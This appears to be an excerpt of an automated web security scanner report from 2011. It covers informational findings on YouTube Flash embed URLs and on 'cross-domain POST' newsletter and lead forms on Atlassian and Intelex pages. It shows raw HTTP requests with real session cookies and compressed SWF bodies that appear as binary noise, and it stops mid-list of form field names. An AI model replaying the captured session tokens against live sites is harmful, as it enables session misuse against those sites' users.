GET /v/LpBCsQQ_v0U&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1133
Content-Type: application/x-shockwave-flash

CWS.5...x..V[s.D.>..H..5iM.I..t`...Ih.J..$f.Kl`.......V..v.D..>..3<.o..+..Ub.....=.o.wV.9.=........;.....+..o..8.....{..[+'..9e+.U.n.$<...Sc\..2..&.3.X.y...d..`$...m..5w...<.xT....~..V.U...6..%g...>.x..:.a..#2..;..r......#..8..kX
.    u-......i. v..#.)5;.AiHL.`.*.G|.J...).........)..m..........VAS..+VH....A..O...}..._..{.....E......>{....x...c..,..k...<"..u.......-6    ..a...MM..3......v.[.^..ys.,>n.{).eD.......H.,.>9.e'.......'....k>.}c>..\^^...N....
.... ..Ch.r......-...._3.C.3./....Q.....F.....v.sC.........%...KX.w'.K"0m.....(...{.95C..?.L:.r.H.c......s`Z.g.t=..f..#.3
..lBY.$......|..1...=&..`.K;."'..4.\&{*V..3..'.\.&......-k.
.K.q.q..78..
\....z.u. ..3q.&
.P...V..,.2E....k ....HM{..
..B!S.B...x...@...........
.D...w.4.Q..`
....._,.4YL.|.S.|......nD...,    ..XWZ.|."V..-R.*Nr.eQ....M1sS.!"Pu
.v..X..@U.K]..#O..Hz.....N......6...-......`........w.S/..m..x....,[...^..\...a...8.*..rN0....y...H..5.R..k.SD*i..p..?..../[|..:/.    P...............X.p. .h..V..^.>L.Q..........)x.y.>.*.(.=Q3.$E.....1t[L[.....E.......o.IZ...+fE...*'..<..f........C.......y.W7......K.^..E(./....>k2.....n...U./..z    ed....~..._O..EXN?P..H.a./.......

Request 2

GET /v/LpBCsQQ_v0U&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:40 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1118
Content-Type: application/x-shockwave-flash

CWS.....x..V[s.D.>..H..5iM.i..t`...Ih.J..M......'.,.e..$.+'...)....~.O.[...b;.~X....\$.........2px...S...0....#.`.X.W...r...S..Qe.VN..:==5.._+.?l20c.._..lN...z.Q..6.Qr.`@.C.G.....7.j.Z.!*n..]rfXA.3...(C...1"....P-WQ.x..<...#;...p.P.2=/)....Kb..8B.R.C.........x.w....
|.b..L....!..p.6.=.L.M.n..
..._.B..x...rT.........h.....7-..].`........c.?...gA.M.Wy......D.l.....$0\.5WjT5.B.L<.2c..1/....a.........W.M..n6.BD....c@..5...6.PW.//_/B'......1....t.-[N..:p...P.y.[.KHe...}..0
X.....t}....{n..8"b2.t......    ..:A[..i.u,v......G^P3t.....C ..D>.z......"8...q.0#'...Q..`... ...pD>l.(...
^L.    .6..3...W....dM.I.`.}....o....D..-k...?.q.q..7x.*..j8..z.u. |..8]..t(..+.O.3...].|...x...iOTPAWZ.d
..^..g`e.d..Y\.].x?...GND[..0.@..u.    .P
\,...
...0X..0.,....8..6@.,......s....)be.."...$.Z.E...\g3.Y.,.Ug.o...%`TE..........w...5n.......A..n.I.-.G.`X......=.:W....9.;.g..d.........wQ........D.s.F#/j.....F^..uCZ
O%.\.........i.o...i5...{... ..^......X..Z.X4_+...~.&.(P..gQ...
....u....J.K.........RNG.....}~.:u.....^...#..E...Y..*...~C.PQ3r...X...!.....5.....~..l...W.x....K[H.Y..tE..v...W...r.%....'K..".~&Y....~..............m

18.16. http://www.youtube.com/v/O3iZU0WCuwc&autoplay=1 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/v/O3iZU0WCuwc&autoplay=1

Request 1

GET /v/O3iZU0WCuwc&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:34 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1124
Content-Type: application/x-shockwave-flash

CWS.....x.}U.r.D..,..rlk..@...t`.vB...JS.$f....
7.YZ.jeIH.8~.z.K.p...U_+..Rb...xV........y.....3....}............<..T....w.v...............xhV.X.g../?.l....F.l.e..,...z.4..Tw.m....fu.z..W...u..=.l.'..0Nl=4...@.\%.7.w....8.|._.....y|.t.i..J..}V.../..A.e%........<......gE".V..p].K..&...h..<z4u......x.3..:....................6.{..mo......Y..u.......C.F.....1.$..."ub_.....;.k*.$:.....N...o."-.........f..._.jMW.c..l...2..T.    p.}.I.CM9??5.V......-]o....fQ..Gq....|.....d>C..m.......>.........Us...\BF.}2...............e.(.]

..T....8....Q......PO.M..o.0.u.....Fh...".<X,..?B.    82.Ud...
...J....5M.tV.....\.5..T] .....i..Y.B..)...Q.%...uQ.J....^..x+...\..f.@.J........H..&.9.L..T..X.
Mi..)&D...5..$).gi.45/.I.E|r..L..q.y.Q.?".JQ...v. .d.%..&...X..G..2....,H..\..B|."V6......s.g......d.u..$.........p.."Uj    _(
...Ik...c\K.}..\.AMD.....[..&.(..s.r}....T..7.N...5......Im..b..MRU.NM.@tNV8.-..2.sH....    -L..Mi...3RqF.8Q,eD.......y    j..R.].....; .Y..%..I,.<]+...~..yb.......hK....ua.M.J.J{.....D....l1R.OSv..d..X.O.~N.....(.    E.JSU.TQ.+.    .5.4...............NM?..7.......E(.W.m1..|.KS$.l..m1.."..3..%..x...f...G4......K.dFo=......

Request 2

GET /v/O3iZU0WCuwc&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

18.17. http://www.youtube.com/v/QO6L5AtZ5kE&autoplay=1 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/v/QO6L5AtZ5kE&autoplay=1

Request 1

GET /v/QO6L5AtZ5kE&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1120
Content-Type: application/x-shockwave-flash

CWS.....x.}U[s.D.>..H..5mM.I..00`'......NH.$.k3Px.....F..v....>..3<.o..+..Ub......{....<.(......;.....`....&...y.[..[....n....3....}\...O.j.....4.....+.%...t...C........`gc.....w6767.E.m.3..[v...`k.e....VB......."........^..........0.;...w....U.I4.x.$"................Uv....%...eu.v>..7.....P......o... ....Ua.2...O.......=b..V....g...k....|.<9..hZ.....Tf. .u.....C#.GXS.F.    @..Q.3n#'.5y/....p.........j..!=gU7....Hh...S..H..4..........._B.....O.KY.vGi..WKF......>.Lf.A.'..I.#>.)...B.....1..$.pz0...$......1.....4..}L
4$..>g$... ..z.i.b......9 6.."~ <.$n:.!g0....'...P....#...NP...DBp.g.iV...,.|.j)).....(?..C/....@...    p...}.!F..m........Q.I.......50.\,....y...Rti.M./#..[..............-...:..7...n.~.C....6..~l.!"..c....X)....&.a../a..m    :.<...A..K...,J.........m..Vy\.#.....^es.. Y..O...w.)....4i(.0.........k...}    .pS.]....$.7$.L.a...`*.....Su..z4es_.,_...YR.....a......
.|Av.`.7...s.    >j../\.....2..i8c~..+9...f......V..5..y.{..C4..cQ....b..Z.rE..0.G.>;=.*.zW:...../s.U.^.{..p..}...f..l>+.......5?..9y^=Tm.d......f.....5=.....%......*.../{..u..l..|v.j./B..biK.>.*..I..n    .bU.+%...q:..x..?.N...p...O.~$...~...w..

Request 2

GET /v/QO6L5AtZ5kE&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1109
Content-Type: application/x-shockwave-flash

CWS.....x.}U[s.D.>..H...ik.N.....;...d.4uBb&.]....f-.%5.$..$...)....~.O.[.....W.x....w.J.0............../j.....4 .<...z.....?rkv4............q._..t.....=.]X.,.P....u............[.7.~......-.n.......4.....C.........X.....p....7..*.h.8M...X.....z......:L.Q..$. d.....,F.(t..F.... .., ...k..................}s:..i7<:. .....x.p...h...56.O..>{.s\.....C..Y.D..U]uF.*....M.....F...f.F.1@..q.3n."'.....k..8O.;.~...R.j./!..G"D...vyy..............O.KY.v.i....F......>.Lg.A4 ..I.#>.)...B.....1.rI(.t...q.. -..#.. ..i"].,
4$..>g$...0 ..z.i.b..l.
.9$6.9"~ ".$n:.!g0....'...P.....QtJ.(..4....YwV.........re;0...<..:..3.I5...L...,. .1....^....n.Oy7......1...J.........H..).l~....5...:.Z..\Y ....9X\.Ey+.co...'>4.(.ls..'..".i<..ZY....X.i... | SK.-....@..2fAZ..eI..ma...kk..)nT&.0..jOE.U1...RD.....J...l..I....G..-..^.3=........4...+..)...`..I.]...w.S/..v..h....Y.<).YV.......Zuy:]..rAv.`..J..y....JJ..+.SFjY..t.3?V...([y...(kHP..a5...~..w..V.cQ....b..Z.tE..0Y@.^..E.c.'......(s.U.Q.{.fp..}.Qy=b...Q..............;Pm.d......f...7. 5=.....e......=.|.......n......Q.........gC.25 6.+CC\U.J..?f...2.......c..K..d/.i1....?....

18.18. http://www.youtube.com/v/tYy3w4lIafA&autoplay=1 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/v/tYy3w4lIafA&autoplay=1

Request 1

GET /v/tYy3w4lIafA&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:17 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1141
Content-Type: application/x-shockwave-flash

CWS.A...x..V[s.F.>.a.k.....1n.z.i...$.6..S...2..I..E(....1..y.#3}hK................."q.3..r..........iG..=.p....s....N.4..g...W>s...ps...Ho.....=....:.ae..@..z.jY.B....=...l.<.<..Ie....
Ly....b..lnl....9...p.....6.W...Fh....ht.Gv......f...el..O..xB,Zt.........2......&.....@e......u..)Q..e..l..*......Q.q.r7d?...^....K.~e.........Jm.t......o/_.,...?......U4.....2....D .9/Jd..t..T.Qu...d.:..^`..&.........F..._D41...J..m.....X.....24...Ia....f]...j...og........i.M.=%6e..=..M.\.fP.|.{..Hd.....B..<....G....XU. .+ID .....O..4..:..-..XV.{...@}.q.kFB...s ..=.4.1...P...#].cJ.Wx.....>g.....G..b_.....^pF'(D.i$!X...4+.Q....W5....TWA4.........!Z^K.8......;d....0...k.).. q ..H..
.......L. E..x%......i.t........I_...`aT.ki.%C..~.C....6..q....hd.a.-/.Ji\,.0i...|...l]....@...g^j..fQ...P_$..5h..7
..d.(.OX.:....d..>.~..z..gA..IU......HF+..\.V..[...2.J...#..'.l...~;.S..\.^......)...g..h.....X...-...v.*.......\....A"...S.p]V..SK<g...qO..S"m...+"mV......1...q...lV.E.Os.K6...K[d..y......b...._....2&^E.e|.k
.j..I).F.....}u.:}^P.ky......-......U..]4........=.)....<....w.b.]5O.ju.}.._..E(.W,m>....eh.l...m.....C{.8..0............... .a.1..D.R

Request 2

GET /v/tYy3w4lIafA&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1130
Content-Type: application/x-shockwave-flash

CWS.*...x..V[S.F.>.e$.I.$..!.m....8\.0m.0)...kg:..fm.e.YR.+...y..3}hK.....].BnS.Y.....9G...<....p?.....~N75..c.7.<....n........b'.....5.<.....W..a...=^|.:.2\...I.mj..F........l.<*?..Iy....
Ly..s...>....D.=.r.X.....<,n<...Q....=
Po.>.-...>-4...(c..}.~..b.....h..^...) ............[eT......[.5JQ....c
....^BU..K...p...q.?>,
...::....Z...=.a....;..|....z...#{.<..iv.W....&@$(........".).Qu..zd...[....'.........z..._D41......m..]...._M..kM.......,4R......j..)q(+v.A.j....Au....o .Y.....a....B
}......xn...D.p.....I..%5..1....mW..6&....G_3..x..GX........'......P.G.z..H..}.s.].l.x.. ............ .F...kL...%`..r..\..L..D...mzQ..,....D...,n#.1,.(V.....^.E9.F..G.......f.....8..Rti..O/..'..>.A.S..!.S..%.u
..@Q^M....!...M<22.L......h..0...b.4/.D.4.A...D3[..\.X.[..3/5.R.(...P_&..5...7....i..&G..1u....@. ....S...].&.%..".. ..\}r.[ .oa..4.J...#..'.l..I.....w....x.]{:esW.,.....S.....y........sFV8c.W...9H._T..,\........i8c.S...H.?..HkHP......|.9..!....(.nNb1.|.\9".....@...E.c.)...p...9.*H/..^S.T..L......'.}u.:}^...r?'....,......U.L].......T.=.)._....Y..;y...X'{.....F.F."..+.6....b....n.`[.*|....0N.....g.v........Kt.....?.?....

19. Cross-domain POST previous next
There are 6 instances of this issue:

http://www.atlassian.com/software/fisheye/
http://www.atlassian.com/software/greenhopper/
http://www.atlassian.com/software/jira/
http://www.atlassian.com/software/jira/pricing.jsp
http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx
http://www.mavitunasecurity.com/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

19.1. http://www.atlassian.com/software/fisheye/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlassian.com
Path:	/software/fisheye/

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

thx
err
usub
SubAction
MID
Email Address

Request

GET /software/fisheye/ HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/jira/pricing.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.6.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:21:53 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 20438

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

<head>

<title>
FishEye - Subversion, Git, Mercurial, CVS,
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.2. http://www.atlassian.com/software/greenhopper/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlassian.com
Path:	/software/greenhopper/

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

thx
err
usub
SubAction
MID
Email Address

Request

GET /software/greenhopper/ HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/fisheye/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.9.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:11 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 21953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

<head>

<title>
Truly agile project management with GreenHo
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.3. http://www.atlassian.com/software/jira/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlassian.com
Path:	/software/jira/

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

thx
err
usub
SubAction
MID
Email Address

Request

GET /software/jira/?gclid=CLiIoYbNjaoCFcFo4AodkV0lxw HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:23 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 20269

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

<head>

<title>
Bug, Issue and Project Tracking for Softwar
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.4. http://www.atlassian.com/software/jira/pricing.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlassian.com
Path:	/software/jira/pricing.jsp

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

thx
err
usub
SubAction
MID
Email Address

Request

GET /software/jira/pricing.jsp HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/jira/?gclid=CLiIoYbNjaoCFcFo4AodkV0lxw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSessionID=1148063633; CDLASTPAGEID=69200790; JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.3.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:21:23 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

<head>

<title>
Get Started For $10 - Pricing - JIRA
</
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.5. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelex.com
Path:	/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

__VIEWSTATE
__EVENTVALIDATION
first_name
last_name
company
title
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
industry
Other_Industry__c
Number_of_Employees__c
Number_of_Employees__c
Number_of_Employees__c
Number_of_Employees__c
Number_of_Employees__c
Number_of_Employees__c
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
